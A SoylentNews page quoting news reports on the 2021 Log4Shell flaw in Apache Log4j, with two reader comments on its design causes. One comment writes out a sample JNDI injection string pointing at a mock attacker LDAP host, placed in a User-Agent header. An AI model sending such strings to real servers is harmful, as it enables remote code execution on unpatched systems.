SoylentNews is people
SoylentNews
from the is-that-what-'write-once,-run-anywhere'-means? dept.
'The Internet is on Fire'
The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application. Security responders are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems. Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
Log4j is a Java library, and while the programming language is less popular with consumers these days, it's still in very broad use in enterprise systems and web apps. Researchers told WIRED on Friday that they expect many mainstream services will be affected.
For example, Microsoft-owned Minecraft on Friday posted detailed instructions for how players of the game's Java version should patch their systems. "This exploit affects many services—including Minecraft Java Edition," the post reads. "This vulnerability poses a potential risk of your computer being compromised." Cloudflare CEO Matthew Prince tweeted Friday that the issue was "so bad" that the internet infrastructure company would try to roll out a least some protection even for customers on its free tier of service.
All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
"It's a design failure of catastrophic proportions," says Free Wortley, CEO of the open source data security platform LunaSec. Researchers at the company published a warning and initial assessment of the Log4j vulnerability on Thursday.
'The Internet's on Fire': Techs Race to Fix Major Cybersecurity Software Flaw
'The internet's on fire': Techs race to fix major cybersecurity software flaw:
Amit Yoran, CEO of the cybersecurity firm Tenable, called it "the single biggest, most critical vulnerability of the last decade" — and possibly the biggest in the history of modern computing.
The vulnerability, dubbed 'Log4Shell,' was rated 10 on a scale of one to 10 the Apache Software Foundation, which oversees development of the software.Anyone with the exploit can obtain full access to an unpatched computer that uses the software. Experts said the extreme ease with which the vulnerability lets an attacker access a web server — no password required — is what makes it so dangerous.
New Zealand's computer emergency response team was among the first to report that the flaw was being "actively exploited in the wild" just hours after it was publicly reported Thursday and a patch released.
The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on November 24 by the Chinese tech giant Alibaba, it said. It took two weeks to develop and release a fix. But patching systems around the world could be a complicated task.
May I have a cup of water?
(Score: 5, Insightful) by VLM on Saturday December 11 2021, @05:54PM (1 child)
Its interesting to look at this from other perspectives than strictly security dudez
From a developer point of view it looks like the problem is three parts:
https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup [apache.org]
That sounds like a nifty feature, you can enhance your logs by doing JNDI lookups over various protocols.
Also language features like string interpolation sound so cloyingly simple and attractive when writing code.
Another novel language feature is first class functions mean you can pass classes around and run them, data as code, what could possibly go wrong?
Mix the three together, separately none of which are a problem if used correctly, and you try to log some bastards User-Agent: and he tells you its "${jndi:ldap://pown.me.harder.fu/naughty}" and that file is a java class fetched over ldap that powns your web server.
I think the standard SN comparison to the classic little bobby tables, is instead of running the directly passed SQL, you hand the victim a string interpolated URL capable of downloading a picture of the little bobby tables cartoon jpeg and the dumb SOB fetches the cartoon pix, then OCRs the pix, then executes the OCR'd code blindly as if its trustworthy code, LOL.
(Score: 4, Touché) by sgleysti on Saturday December 11 2021, @07:50PM
I'm certain this could have been avoided with more layers of abstraction not understood by the developers writing the high-level code.